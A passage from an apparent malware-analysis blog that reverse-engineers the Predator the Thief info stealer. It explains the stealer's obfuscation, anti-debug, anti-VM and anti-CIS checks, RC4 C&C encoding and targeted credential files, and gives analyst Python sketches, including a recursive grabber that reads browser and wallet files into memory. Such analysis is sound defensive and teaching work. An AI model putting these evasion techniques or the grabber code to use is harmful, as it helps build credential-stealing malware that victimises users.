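The magic numbers in the section loop above are easier to read once you know that 248 is the size of a 32-bit IMAGE_NT_HEADERS (4 + 20 + 224) and 40 is the size of one IMAGE_SECTION_HEADER. The fields the decompiler shows as Section[1].Size, Section[2].Size and Section[2].VirtualAddress then land at offsets 12, 20 and 16, i.e. VirtualAddress, PointerToRawData and SizeOfRawData. Here is a small Python sketch that walks the section table the same way. It assumes a standard PE32 optional header of 224 bytes, like the packer does, and the function name is mine.

```python
import struct

NT_HEADERS32_SIZE = 248    # 4 (signature) + 20 (file header) + 224 (optional header)
SECTION_HEADER_SIZE = 40   # sizeof(IMAGE_SECTION_HEADER)


def list_sections(pe):
    """Return (name, virtual_address, raw_size, raw_offset) for each PE32 section."""
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE image")
    # NumberOfSections sits 2 bytes into the file header, right after the signature.
    number_of_sections = struct.unpack_from("<H", pe, e_lfanew + 6)[0]
    sections = []
    for i in range(number_of_sections):
        off = e_lfanew + NT_HEADERS32_SIZE + SECTION_HEADER_SIZE * i
        name = pe[off:off + 8].rstrip(b"\0").decode("ascii", "replace")
        # VirtualAddress (+12), SizeOfRawData (+16), PointerToRawData (+20)
        virtual_address, raw_size, raw_offset = struct.unpack_from("<III", pe, off + 12)
        sections.append((name, virtual_address, raw_size, raw_offset))
    return sections
```

Each tuple tells you which raw_size bytes at raw_offset get written to virtual_address + base in the remote process, which is what the loop does with NtWriteVirtualMemory.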
Same but different, but still the same
As explained at the beginning, once you have reversed this packer, you understand that the core is pretty similar every time. It took only a few seconds of setting breakpoints at specific places to reach the shellcode stage(s).
Identifying core pattern (LocalAlloc, Module Handle and VirtualProtect)
The funny part is the decryption now used in the first stage: it's an exact copy-paste of the one on the shellcode side.
TEA decryption replaced with rand() + xor like the first shellcode stage
At the start of the second stage, there is not much to say, as the instructions are almost identical.
Shellcode n°1 is identical in two different campaign waves
It seems that the second shellcode changed a few hours ago (at the date of this paper), so let's see if others are motivated to make their own analysis of it.
Conclusion
Well well, it's cool sometimes to deal with something easy but efficient. It has indeed surprised me to see that the core stays identical over time, but I insist that this packer is really awesome for training and teaching someone malware/reverse engineering.
Well, now it's time to get serious for the next release.
Stay safe in those weird times o/
Let's play (again) with Predator the thief
Whenever I reverse a sample, I am mostly interested in how it was developed. Even if in the end the techniques employed are generally the same, I am always curious about how a task was achieved, or simply want to understand the code philosophy of a piece of code. It is a very nice way to spot different trends and to discover (sometimes) new tricks that you never knew were possible. This is one of the main reasons I love digging mostly into stealers/clippers, for how accessible they are to reverse, and I enjoy malware analysis as a kind of game (with some exceptions like Nymaim, which is literally hell).
It's been a year and a half now since I started looking into "Predator The Thief", and this malware has evolved over time in terms of content added and code structure. Others may have a totally different impression in terms of the stealing tasks performed, but compared with my first in-depth analysis, the code has changed so much that it was necessary to make another post on it.
This one will focus on some major aspects of the 3.3.2 version, but will not explain everything (because some details have already been mentioned in other papers and some subjects are well known). Also, from time to time I will add some extra commentary about malware analysis in general.
Anti-Disassembly
When you open an unpacked binary in IDA or another disassembler like Ghidra, a certain amount of code is not interpreted correctly, which leads to rubbish code and the inability to construct instructions or show a graph. Behind this, it's obvious that an anti-disassembly trick is used.
The technique exploited here is known and used in the wild by other malware. It requires just a few opcodes and ends with the creation of a false branch. In this case, it begins with a simple xor instruction whose purpose is to set the zero flag and force the JZ jump to be taken no matter what, so at this stage it's understandable that something suspicious is in progress. Then the MOV opcode (0xB8) right after the jump starts a 5-byte instruction and tricks the disassembler into treating it as the right one to interpret, although the correct opcode is hidden inside it. In the end, by following this wrong path, the malicious tasks stay hidden.
Of course, fixing this issue is simple and requires just a few seconds. For example, with IDA, you need to undefine the MOV instruction by pressing the keyboard shortcut "U", to produce this pattern.
Then skip the 0xB8 opcode and press "C" at the 0xE8 position to make the disassembler interpret the instruction at this point.
Replacing the 0xB8 opcode with 0x90 (NOP) in a hexadecimal editor will also fix the issue. Opening the patched PE again, you will see that IDA is now even able to show the graph mode.
After patching, there are still some parts that can't be parsed correctly by the disassembler, but after reading some of these code locations, some of them are correct. If you want to create a function, you can select the "loc" section and press "P" to create a sub-function. Of course, this action could lead to something irreversible if you are not sure about what you are doing, forcing you to restart the whole process of removing the anti-disassembly tricks, so it must be done only as a last resort.
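If the trick shows up dozens of times, patching by hand gets old quickly. Below is a minimal Python sketch that automates the 0xB8 to 0x90 replacement. The exact byte pattern (xor eax, eax / jz +1 / 0xB8) is an assumption on my side for illustration; the registers and jump encoding in a real sample may differ, so adapt PATTERN to what you actually see.

```python
# Assumed pattern: xor eax, eax (33 C0), jz short +1 (74 01), junk byte 0xB8.
PATTERN = bytes([0x33, 0xC0, 0x74, 0x01, 0xB8])


def patch_junk_mov(code):
    """Replace the junk 0xB8 after each always-taken JZ with a NOP (0x90).

    Returns the patched bytes and the number of patches applied.
    """
    patched = bytearray(code)
    count = 0
    start = 0
    while True:
        idx = code.find(PATTERN, start)
        if idx == -1:
            break
        patched[idx + len(PATTERN) - 1] = 0x90
        count += 1
        start = idx + len(PATTERN)
    return bytes(patched), count
```

A blind byte search can also hit data that merely looks like the pattern, so it is safer to run it on the code section only and to review the number of matches before saving the result.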
Code Obfuscation
Whenever you are analyzing Predator, you know that you will have to deal with obfuscation tricks almost everywhere, just to slow down your code analysis. Of course, they are not complicated to assimilate, but as always, simple tricks used at their finest can turn a simple fun afternoon into a literal "welcome to Dark Souls". The concept was already there in the first in-depth analysis of this malware, and the idea has persisted through further updates. The only differences are easy to guess:
- More layers of obfuscation have been added
- Techniques already used have just been adjusted
- A bigger dose of randomness
From a reversing point of view, I consider this part one of the main ways to recognize this stealer. Of course, you can add network communication and C&C patterns as other ways of identifying it, but inspecting the code is one way to clear up doubts (and I understand that this statement certainly does not work for every malware). The idea is that nowadays it's incredibly easy to make mistakes by being duped by rules or tags on sandboxes, due to similarities based on code sharing, or by someone literally creating a false flag.
GetModuleAddress
Already present in a previous analysis, recreating GetProcAddress is a popular trick to hide an API call behind a simple register call. Over the updates, the main idea is still there, but the main procedures have been modified, reworked or slightly optimized.
First of all, we easily recognize the PEB being retrieved by spotting fs:[0x30] behind some extra instructions.
Then from it, the loader data section is requested for two things:
- Getting the InLoadOrderModuleList pointer
- Getting the InMemoryOrderModuleList pointer
For those who are unfamiliar with this, the PEB_LDR_DATA is the structure that stores all the information related to the loaded modules of the process.
Then, a loop performs a basic search over every entry of the module list, in "memory order", in the loader data: it retrieves the module name, generates a hash of it, and compares it with a hardcoded, obfuscated hash of the kernel32 module. If it matches, the module base address is saved; if not, the process is repeated with the next entry.

The XOR kernel32 hashes compared with the one created
Nowadays, using hashes for a function name or module name is something that you can see in many other malware families. The purposes are multiple, and this is one of the ways to hide some actions. Examples of this code behavior can easily be found on the internet and, as I said above, the trick is popular and already widely used.
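To make the lookup logic concrete, here is a minimal Python sketch of a hash-based module search. The hash function (a ROR-13 additive hash over the lowercased name) and the XOR key are purely hypothetical stand-ins; I am not claiming Predator uses these, only that the structure (hash each name, un-XOR the hardcoded constant, compare) is the same.

```python
def ror32(value, bits):
    """Rotate a 32-bit value right by the given number of bits."""
    return ((value >> bits) | (value << (32 - bits))) & 0xFFFFFFFF


def name_hash(name):
    """Hypothetical ROR-13 additive hash over the lowercased module name."""
    h = 0
    for ch in name.lower().encode("ascii"):
        h = (ror32(h, 13) + ch) & 0xFFFFFFFF
    return h


XOR_KEY = 0xDEADBEEF  # hypothetical obfuscation key
# Stands in for the constant that would be hardcoded in the binary.
OBFUSCATED_KERNEL32 = name_hash("kernel32.dll") ^ XOR_KEY


def find_module(modules, obfuscated_hash, key=XOR_KEY):
    """modules: iterable of (name, base_address) pairs, in memory order."""
    wanted = obfuscated_hash ^ key
    for name, base in modules:
        if name_hash(name) == wanted:
            return base
    return None
```

When you face such a routine, re-implementing the hash like this and running it over the names of common system DLLs (or export names) is usually the fastest way to recover what each constant stands for.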
GetProcAddress / GetLoadLibrary
Always following GetModuleAddress, the code for recreating GetProcAddress has by and large the same architecture as in v2, in terms of the concept used. If the function is forwarded, it basically performs a recursive call to itself: it gets the forward target, checks that the library is loaded, then calls GetProcAddress again with the new values.
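The forwarding case can be sketched in a few lines of Python. In a real export table, a forwarded entry is a string such as "NTDLL.RtlAllocateHeap" instead of code; here the export tables are faked with plain dictionaries, and the function name, the depth limit and the ".dll" suffix handling are my own assumptions for illustration.

```python
def resolve_export(modules, module, func, depth=0):
    """Resolve func in module, following forwarder strings recursively.

    modules maps a lowercase DLL name to a dict of export name -> address (int)
    or forwarder string ("DLL.Function").
    """
    if depth > 8:  # arbitrary guard against forwarding loops
        raise RecursionError("too many forwarders")
    exports = modules.get(module.lower())
    if exports is None:
        return None  # real code would load the library at this point
    entry = exports.get(func)
    if isinstance(entry, str):
        target_module, target_func = entry.split(".", 1)
        return resolve_export(modules, target_module + ".dll", target_func, depth + 1)
    return entry
```

For example, with a fake kernel32.dll whose HeapAlloc entry is the string "NTDLL.RtlAllocateHeap", the call ends up returning the address stored for RtlAllocateHeap in the fake ntdll.dll.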
Xor everything
It's almost unnecessary to talk about it, but for an in-depth analysis, and if you have never read the other article, it's always worth saying a few words on the subject (as a reminder). XOR encryption is a common cipher that requires only a rudimentary implementation to be effective:
- Only one operator is used (XOR)
- It doesn't consume resources
- It can be used as a component of other ciphers
This one is extremely popular in malware, and the goal is not really to produce strong encryption, because it's ridiculously easy to break most of the time. It is used for hiding information or keywords that could trigger alerts, rules...
- Communication between host & server
- Hiding strings
- Or... simply used as an absurd step for obfuscating the code
- etc...
A typical example in Predator is huge blocks with only two instructions (XOR & MOV), where stack strings are decrypted X bytes at a time by moving content into a temporary value (stored in EAX), XORing it, then moving it back to the stack (EBP-relative), and the principle is repeated again and again. This is rudimentary. In this scenario, it's just part of the obfuscation process heavily abused by Predator, to produce an absurd amount of instructions for simple things.
Also, in some cases, when a hexadecimal/integer value is required for an API call, you can spot another pattern where a hardcoded value is moved to a register, then a single XOR instruction reveals the correct value. This trivial trick is used for some specific cases like the correct offset in the TEB for retrieving the PEB, the RVA of a specific module, ...
Finally, the most common one is the classic for loop with a one-byte XOR key, seen for decrypting modules, functions, and other things...
data = ...  # encrypted string, as a bytearray; its last byte is the key
key = data[-1]
for i in range(len(data)):
    data[i] ^= key
Sub everything
Let's consider this a perfect example of "let's do the exact same thing by just changing one single instruction", so in the end, a new encryption method is obtained with no development effort. That's how a SUB instruction is used to implement a substitution cipher. The only difference that I could notice is how the key is retrieved.
Instead of having something hardcoded directly, a signed 32-bit division is performed, easily noticeable by the use of the cdq & idiv instructions, then the dl register (the low byte of the remainder) is used for the substitution.
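Here is a minimal Python sketch of that SUB variant. One detail worth keeping in mind when replaying it: idiv truncates toward zero, so the remainder takes the sign of the dividend, which is not what Python's % operator does for negative numbers. The function names and the idea of passing the dividend and divisor as parameters are mine; in the binary they are whatever values sit in the registers before the idiv.

```python
def idiv_remainder(dividend, divisor):
    """Remainder as left in EDX by x86 idiv (truncated division)."""
    quotient = abs(dividend) // abs(divisor)
    if (dividend < 0) != (divisor < 0):
        quotient = -quotient
    return dividend - quotient * divisor


def sub_decrypt(data, dividend, divisor):
    """Subtract the low byte of the idiv remainder (dl) from every byte."""
    key = idiv_remainder(dividend, divisor) & 0xFF
    return bytes((b - key) & 0xFF for b in data)
```

With a dividend of 1000 and a divisor of 7, the key is 6, so a string whose bytes were each incremented by 6 comes back in clear.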
Stack Strings
What's the result in the end?
Merging these obfuscation techniques leads to a nonsensical amount of instructions for a basic task, which will obviously burn some hours of analysis if you don't take some time to clean up all that mess with the help of some scripts or whatever other ideas come to your mind. It would be nice to see some scripts released by the community these days.

Simple tricks lead to nonsense code
Anti-Debug
There are plenty of techniques abused here that were not in the first analysis. This is no longer a simple PEB.BeingDebugged check or checking whether you are running a virtual machine, so let's dig into them, one by one, except CheckRemoteDebuggerPresent! That one is easy enough to understand by itself :')
NtSetInformationThread
One of the oldest tricks in Windows, and still doing its job over the years. Put very simply (because a lot of things happen during the process), NtSetInformationThread is called with a value (0x11) obfuscated by a XOR operation. This parameter is a ThreadInformationClass value, specifically the enum member ThreadHideFromDebugger, and once it is applied, the debugger no longer receives any debug events for that thread. The thread handle passed is, of course, the malware's own thread, so when you are analyzing it with a debugger, the result is that it detaches itself.
CloseHandle/NtClose
Inside WinMain, a huge function is called with a lot of consecutive anti-debug tricks. Almost all of them are indirectly related to techniques patched by TitanHide (or strongly look like them). The first one performed is really basic, but pretty efficient at doing the task.
Basically, when CloseHandle is called with a nonexistent or invalid handle while a debugger is attached to the process, it raises an exception, and the debugger will not like that at all. To guarantee that this is not an issue during normal execution, a simple __try / __except block is used, so the API call safely runs to the end without any issue.
The invalid handle used here is a static one, a L33T code with the value 0xBAADAA55, which bores me as much as this face.
It's not a surprise to see stuff like this from the malware developer. Inside jokes, l33t values, anime references and probably other content that I missed are usual things to spot in Predator.
ProcessDebugObjectHandle
When you are debugging a process, Microsoft Windows creates a "Debug" object and a handle corresponding to it. To check whether this object exists for the process, NtQueryInformationProcess is called with the ProcessInformationClass set to 0x1e (which is, in fact, ProcessDebugObjectHandle).
In this case, when no debugger is attached, the NTSTATUS value (the result returned by the API call) is an error with the ID 0xC0000353, aka STATUS_PORT_NOT_SET. This means, "An attempt to remove a process's DebugPort was made, but a port was not already associated with the process.". The anti-debug trick is to verify that this error is there, that's all.
NtGetContextThread
This one may be considered pretty wild if you are not familiar with hardware breakpoints. Basically, there are some registers called "Debug Registers", and they use the DRx nomenclature (DR0 to DR7). When GetThreadContext is called, the function retrieves all the context information of a thread.
For those that are not familiar with a context structure, it contains all the register data of the corresponding thread. So, with this data in hand, the malware only needs to check whether those DRx registers hold a value not equal to 0.
In this case, it's easy to spot that 4 registers are checked:
if (ctx->Dr0 != 0 || ctx->Dr1 != 0 || ctx->Dr2 != 0 || ctx->Dr3 != 0)
Int 3 breakpoint
int 3 (or Interrupt 3) is a popular opcode to force the debugger to stop at a specific offset. As said in the title, this is a breakpoint, but if it's executed without any debugging environment, the exception handler is able to deal with it and the program continues to run without any issue. Unless I missed something, here is the scenario.
By the way, as another scenario for this one (the int 3), the number of times this specific opcode is triggered could also be used as an incremented counter: if the counter is above a specific value, a simple condition is sufficient to check whether it's executed inside a debugger.
Debug Condition
With all the techniques explained above, in the end, they all lead to a final condition step, provided of course that the debugger hasn't crashed. The check is pretty easy to understand and boils down to a simple operation: "setting a value in EAX during the anti-debug function". If everything is correct, this register will be set to zero; if not, it takes one of several possible non-zero values.

The block in red is the correct condition over all the anti-debug tests
...And when the anti-debug function is done, the EAX register is checked by the test instruction, so the ZF flag determines whether execution enters the most important loop, which contains the main function of the stealer.
Anti-VM
The Anti VM is presented as an option in Predator and is performed just after the first C&C requests.
The tricks used are pretty old and basically rely on Anti-VM instructions:
- SIDT
- SGDT
- STR
- CPUID (Hypervisor Trick)
Interestingly, this option is not performed by default if the C&C is not reachable.
Paranoid & Organized Predator
When entering the "big main function", the stealer performs extra validations "again": that you have a valid payload (and not a modded one), that you are running it correctly, and once more that you are not analyzing it.
This kind of paranoid checking step is a result of the multiple cracked builders developed and released in the wild (mostly or exclusively, at one time, coming from XakFor.Net). It's pretty wild and fun to see anti-piracy protections also appear in the malware landscape.
Then the malware does a classic organized setup to perform all the requested actions, which could be represented this way.
Of course, as usual and as already partly explained in the first paper, the C&C domain is retrieved via a table of function pointers before the execution of the WinMain function (where the payload starts doing its tasks).
You can easily see all the functions that will be called, based on the starting location (__xc_a) and the ending location (__xc_z).
Then you can easily spot the XOR strings that hide the C&C domain, as in the usual old Predator malware.
Data Encryption & Encoding
Besides using XOR almost absolutely everywhere, this info stealer uses a mix of RC4 encryption and base64 encoding whenever it receives data from the C&C. Without specialized tools or paid versions of IDA (or whatever other software), it could be a bit challenging to recognize (when you are a junior analyst), due to modifications in some parts of the code.
Base64
The Base64 functions are extremely easy to spot, thanks to the values in the registers before and after the calls. The only thing to notice is that they have a typical signature... a whole block of XOR stack strings. I believe this trick is designed to hide the Base64 alphabet from some Yara rules.
By the way, the rest of the code remains identical to standard base64 algorithms.
RC4
For RC4, things could be a little bit messy if you are not at all familiar with encryption algorithms in a disassembler/debugger; in some cases it can be hell, in others not. Here, this is in fact the amount of code needed to perform the process.
The blocks represent the generation of the array S, then the Key-Scheduling Algorithm (KSA) using a specific secret key that is, in fact, the C&C domain! (if there is no domain but a hardcoded IP, this IP is the secret key), and finally the Pseudo-Random Generation Algorithm (PRGA).
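The three blocks (array S, KSA, PRGA) map directly onto a textbook RC4, which fits in a few lines of Python. The rc4 function below is the standard algorithm; the decode_c2_message helper is only a sketch of how I would replay a captured response, and it assumes the data is base64-decoded first and then RC4-decrypted with the C&C host as key, which should be confirmed against the sample.

```python
import base64


def rc4(key, data):
    """Textbook RC4: build S, run the KSA with the key, then the PRGA over data."""
    s = list(range(256))                 # generation of the array S
    j = 0
    for i in range(256):                 # Key-Scheduling Algorithm (KSA)
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:                    # Pseudo-Random Generation Algorithm (PRGA)
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def decode_c2_message(blob_b64, c2_host):
    """Assumed order: base64-decode, then RC4 with the C&C domain (or IP) as key."""
    return rc4(c2_host.encode("ascii"), base64.b64decode(blob_b64))
```

Since RC4 is symmetric, the same rc4 function works for both directions of the communication.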
For more info, some resources about this algorithm below:
Mutex & Hardware ID
The Hardware ID (HWID) and the mutex are related, and the generation is quite funky, I would say. Even if most people will consider this as something not important to investigate, I love small details in malware. Their role may be meaningless, but for me, every detail counts no matter what (even the stupidest one).
Here the hardware ID generation is split into 3 main parts. I had a lot of fun understanding how this one was created.
First, it grabs all the available logical drives on the compromised machine, and for each of them, the serial number is saved into a temporary variable. Then, whenever a new drive is found, its hexadecimal value is added to it. So basically, if two drives have the serial numbers "44C5-F04D" and "1130-DDFF", ESI will receive 0x44C5F04D, then 0x1130DDFF will be added to it.
When it's done, this value is put into a while loop that divides the value in ESI by 0xA and saves the remainder into another temporary variable; the loop breaks when ESI is below 1. Then the result of this operation is saved and duplicated, and its last 8 digits are appended to it (i.e. 1122334455 will become 112233445522334455).
As if this were not sufficient, the value is put into another loop that performs this operation:
a = ""
for i, s in enumerate(digits):  # digits: the decimal string, iterated as byte values
    if i & 1:
        a += chr(s + 0x40)
    else:
        a += chr(s)
It results in the creation of an alphanumeric string that will be the archive filename used during the POST request to the C&C.
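Putting the three parts together, here is a rough Python sketch of the whole generation. Several points are assumptions on my side and are flagged in the comments: the sum is kept on 32 bits (since it lives in ESI), the decimal digits are taken in their normal order (the div-by-10 loop naturally produces them in reverse, and I have not checked whether they are reordered), and the helper names are mine.

```python
def sum_serials(serials):
    """Add up the volume serial numbers ("44C5-F04D" style) as 32-bit values."""
    total = 0
    for serial in serials:
        # Assumption: the sum wraps on 32 bits, like the ESI register.
        total = (total + int(serial.replace("-", ""), 16)) & 0xFFFFFFFF
    return total


def extend_digits(digits):
    """Append the last 8 digits to the string (1122334455 -> 112233445522334455)."""
    return digits + digits[-8:]


def hwid_from_serials(serials):
    # Assumption: digits are used in normal (most significant first) order.
    digits = extend_digits(str(sum_serials(serials)))
    out = ""
    for i, ch in enumerate(digits):
        # Odd positions are shifted by 0x40, turning '0'..'9' into 'p'..'y'.
        out += chr(ord(ch) + 0x40) if i & 1 else ch
    return out
```

Even if one of these assumptions turns out to be wrong, the shape of the output stays the same: an alphanumeric string where digits and lowercase letters alternate.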

the generated hardware ID based on the serial number devices
But wait! There is more... This value is also part of the creation of the mutex name... with a simple base64 operation on it and some bit operations to cut part of the base64-encoded string, finally giving the mutex name!
Anti-CIS
A classic thing in malware: this feature is used to avoid infecting machines located in the Commonwealth of Independent States (CIS), using a simple API call, GetUserDefaultLangID.
The value returned is the language identifier of the region format setting for the user, and it is checked against a list of specific language identifiers. Of course, as in every situation, all the values that are tested are encrypted.
Language ID | SubLanguage Symbol | Country |
0x0419 | SUBLANG_RUSSIAN_RUSSIA | Russia |
0x042b | SUBLANG_ARMENIAN_ARMENIA | Armenia |
0x082c | SUBLANG_AZERI_CYRILLIC | Azerbaijan |
0x042c | SUBLANG_AZERI_LATIN | Azerbaijan |
0x0423 | SUBLANG_BELARUSIAN_BELARUS | Belarus |
0x0437 | SUBLANG_GEORGIAN_GEORGIA | Georgia |
0x043f | SUBLANG_KAZAK_KAZAKHSTAN | Kazakhstan |
0x0428 | SUBLANG_TAJIK_TAJIKISTAN | Tajikistan |
0x0442 | SUBLANG_TURKMEN_TURKMENISTAN | Turkmenistan |
0x0843 | SUBLANG_UZBEK_CYRILLIC | Uzbekistan |
0x0443 | SUBLANG_UZBEK_LATIN | Uzbekistan |
0x0422 | SUBLANG_UKRAINIAN_UKRAINE | Ukraine |
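As a quick illustration of the check, here is a minimal Python sketch using the identifiers from the table above. The XOR key is hypothetical, and so is the way the constants are stored; the sketch only mirrors the idea that each comparison value is decrypted right before being tested against the result of GetUserDefaultLangID.

```python
XOR_KEY = 0x5A5A  # hypothetical key, for illustration only

CIS_LANG_IDS = [
    0x0419, 0x042B, 0x082C, 0x042C, 0x0423, 0x0437,
    0x043F, 0x0428, 0x0442, 0x0843, 0x0443, 0x0422,
]

# Stands in for the encrypted constants embedded in the binary.
ENCRYPTED_LANG_IDS = [value ^ XOR_KEY for value in CIS_LANG_IDS]


def is_cis_langid(langid, key=XOR_KEY):
    """Return True if langid matches one of the decrypted CIS identifiers."""
    return any((enc ^ key) == langid for enc in ENCRYPTED_LANG_IDS)
```

For an analyst, the practical takeaway is the reverse direction: XOR the constants found next to the GetUserDefaultLangID call with the key and look the results up in the table.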
Files, files where are you?
When I reversed this stealer for the first time, files and the malicious archive were stored on the disk, then deleted. But right now, this is not the case anymore. Predator manages all the stolen data in memory to avoid, as much as possible, any extra traces during the execution.
Predator nowadays creates a lot of allocated pages and temporary files in memory that are used for interactions with real files that exist on the disk. Most of the time it's basically getting handles and sizes, then performing some operations for opening files, grabbing content and saving it to a place in memory. This explanation is summarized in a "very" simplified way because there are a lot of cases and scenarios to manage.
Another point to notice is that the archive (using ZIP compression) is also created in memory by selecting folders/files.

The generated archive in memory
It doesn't mean that the whole architecture for the files is different; it's the same format as before.

an example of archive intercepted during the C&C Communication
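For readers who have never built an archive without touching the disk, the idea is simple to reproduce with the Python standard library. This is only an illustration of the concept, not of Predator's own ZIP code, and the entry names used with it are up to you.

```python
import io
import zipfile


def build_archive_in_memory(entries):
    """Build a ZIP archive entirely in memory.

    entries maps an archive path to its content (bytes). Nothing is written
    to disk: the archive lives in a BytesIO buffer.
    """
    buffer = io.BytesIO()
    with zipfile.ZipFile(buffer, "w", zipfile.ZIP_DEFLATED) as archive:
        for name, content in entries.items():
            archive.writestr(name, content)
    return buffer.getvalue()
```

The returned bytes start with the usual "PK" magic, which is also a convenient marker to look for when dumping memory or inspecting the body of the POST request.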
Stealing
After explaining this stuff many times, the fundamental idea is boringly the same for every stealer:
- Check
- Analyzing (optional)
- Parsing (optional)
- Copy
- Profit
- Repeat
What could differ behind that is how they obfuscate the files or values to check... and guess what... every malware has its specialties (when its authors have not decided to copy the same piece of code from GitHub or some generic .NET stealer), and in the end, there is no black magic, just a simple (or complex) enigma to solve. As a malware analyst, when you start analyzing stealers, you literally want to understand everything, because everything is new. With time, you recognize the routine performed to fetch the data and how stupidly well it works (as a reminder, it might not always be that easy for some highly specific stuff).
In the end, you just want to know the targeted software, and only dig into those you haven't seen before, but every time the thing is the same:
- Checking dumbly a path
- Checking a registry key to get the correct path of a software
- Checking a shortcut path based on an icon
- etc...
Besides that, Predator the Thief is stealing a lot of different things:
- Grabbing content from Browsers (Cookies, History, Credentials)
- Harvesting/Fetching Credit Cards
- Stealing sensitive information & files from Crypto-Wallets
- Credentials from FTP Software
- Data coming from Instant communication software
- Data coming from Messenger software
- 2FA Authenticator software
- Fetching Gaming accounts
- Credentials coming from VPN software
- Grabbing specific files (also dynamically)
- Harvesting all the information from the computer (Specs, Software)
- Stealing Clipboard (if during the execution of it, there is some content)
- Taking a picture of you (if your webcam is connected)
- Taking a screenshot of your desktop
- It could also include a Clipper (as a modular feature).
- And... due to the module manager, other tasks that I haven't mentioned here (and that I don't know about either).
Let's explain just some of them that I found worth digging into.
Browsers
Since my last analysis, things have changed for the browser part, and it's now divided into three major parts.
- Internet Explorer is analyzed in a dedicated function because the data is contained in a "Vault", so it requires a specific Windows API to read it.
- Microsoft Edge is also handled in a separate part of the stealing process because it uses unique files and needs some extra tasks for the parsing.
- Then, the other browsers are fetched by using a homemade static grabber
Grabber n°1 (The generic one)
It's pretty fun to see that the stealing process uses a single function for catching a lot of things. This generic grabber is pretty "clean" compared with what I saw before. Even if there is no magic at all, it's sufficient to do enough damage, by using a recursive loop at a specific place that searches for all the required files & folders.
Compared with older versions of Predator: when they attempted to steal content from browsers and some wallets, they checked specific directories or registry keys step by step, then went through some loops and tasks for fetching the credentials. Nowadays, this step has been removed (for the browser part) and folded into this raw grabber, which parses everything starting from the %USERS% directory.
As usual, all the variables that contain the required files are obfuscated and encrypted by a simple XOR algorithm, and in the end, this is the "static" list that the info stealer focuses on:
File grabbed | Type | Actions |
Login Data | Chrome / Chromium based | Copy & Parse |
Cookies | Chrome / Chromium based | Copy & Parse |
Web Data | Browsers | Copy & Parse |
History | Browsers | Copy & Parse |
formhistory.sqlite | Mozilla Firefox & Others | Copy & Parse |
cookies.sqlite | Mozilla Firefox & Others | Copy & Parse |
wallet.dat | Bitcoin | Copy & Parse |
.sln | Visual Studio Projects | Copy filename into Project.txt |
main.db | Skype | Copy & Parse |
logins.json | Mozilla Firefox & Others | Copy & Parse |
signons.sqlite | Mozilla Firefox & Others | Copy & Parse |
places.sqlite | Mozilla Firefox & Others | Copy & Parse |
Last Version | Mozilla Firefox & Others | Copy & Parse |
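From a defender's point of view, the same walk is useful for knowing which files on a test machine would be hit. Here is a minimal Python sketch of a recursive search driven by a static list of file names. The list is a subset of the table above, and the function name is mine; the real grabber also parses what it finds, which is not reproduced here.

```python
import os

# Subset of the file names from the table above.
STATIC_TARGETS = {
    "Login Data", "Cookies", "Web Data", "History",
    "formhistory.sqlite", "cookies.sqlite", "wallet.dat", "main.db",
    "logins.json", "signons.sqlite", "places.sqlite",
}


def find_static_targets(root, targets=STATIC_TARGETS):
    """Recursively list the files under root whose name is in the static list."""
    hits = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for filename in filenames:
            if filename in targets:
                hits.append(os.path.join(dirpath, filename))
    return sorted(hits)
```

Because the match is on the file name only, any Chromium or Gecko based browser that keeps the same file layout is caught without being explicitly listed, which is exactly why the generic grabber covers so many browsers.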
Grabber n°2 (The dynamic one)
There is a second grabber in Predator The Thief, and it is not only used when a config is available in memory from the first request made to the C&C. In fact, it's also used as part of the process of searching for & copying critical files coming from wallet software, communication software, and others...
The "main function" of this dynamic grabber only requires three arguments:
- The path where you want to search files
- The requested file or mask
- A path where the found files will be put in the final archive sent to the C&C
When the grabber is configured for a recursive search, it simply appends the value ".." to the path and checks whether the next file is a folder, to enter the same function again and again.
In the end, fundamentally, this is almost the same pattern as the first grabber, with the only difference that in this case, files are not parsed/analyzed in depth. It simply follows these steps:
- Find a matched file based on the requested search
- Creating an entry in the stolen archive folder
- Setting a handle/pointer to the grabbed file
- Save the whole content to memory
- Repeat
Of course, there are a lot of particular cases to take into consideration here, but the main idea is like this.
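The three-argument design can be sketched in Python as follows. This is my own simplified reading of the steps above: a search path, a file mask, and a destination folder inside the archive, with an optional recursion flag. The function name, the use of fnmatch for the mask and the dictionary used to hold the contents are all assumptions for illustration.

```python
import fnmatch
import os


def grab(search_path, mask, archive_dir, recursive=False):
    """Collect files matching mask under search_path, keeping them in memory.

    Returns a dict mapping the path inside the archive to the file content.
    """
    grabbed = {}
    for entry in sorted(os.listdir(search_path)):
        full_path = os.path.join(search_path, entry)
        if os.path.isdir(full_path):
            if recursive:
                # Enter the same function again for each sub-folder.
                grabbed.update(grab(full_path, mask, archive_dir + "/" + entry, True))
        elif fnmatch.fnmatch(entry, mask):
            with open(full_path, "rb") as handle:
                grabbed[archive_dir + "/" + entry] = handle.read()
    return grabbed
```

The returned dictionary has the same shape as what an in-memory archive builder expects, so the content never needs to be copied to a temporary location on disk.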
What is Predator stealing in the end?
If we set the dynamic grabber aside, this is the current list (for 3.3.2) of the software impacted by this stealer. For sure, it's hard to know precisely all the browsers that are impacted, due to the generic grabber, but the most important ones are listed here.
VPN
- NordVPN
Communication
- Jabber
- Discord
- Skype
FTP
- WinSCP
- WinFTP
- FileZilla
Mails
- Outlook
2FA Software
- Authy (Inspired by Vidar)
Games
- Steam
- Battle.net (Inspired by Kpot)
- Osu
Wallets
- Electrum
- MultiBit
- Armory
- Ethereum
- Bytecoin
- Bitcoin
- Jaxx
- Atomic
- Exodus
Browser
- Mozilla Firefox (also Gecko browsers using same files)
- Chrome (also Chromium browsers using same files)
- Internet Explorer
- Edge
- Unmentioned browsers using the same files detected by the grabber.
Besides stealing, other actions are also performed, like:
- Performing a webcam picture capture
- Performing a desktop screenshot
Loader
There are currently 5 kinds of loaders implemented in this info stealer:
- RunPE
- CreateProcess
- ShellExecuteA
- LoadPE
- LoadLibrary
For all of these cases, I have explained below (in another part of this analysis) the options of each technique. There is no magic, and there is nothing more to explain about this feature these days; there are enough articles and tutorials that talk about it. The only thing to notice is that Predator is designed to load the payload in different ways, either by a simple process creation or by abusing some process injections (on this part, I recommend reading the work from Endgame).
Module Manager
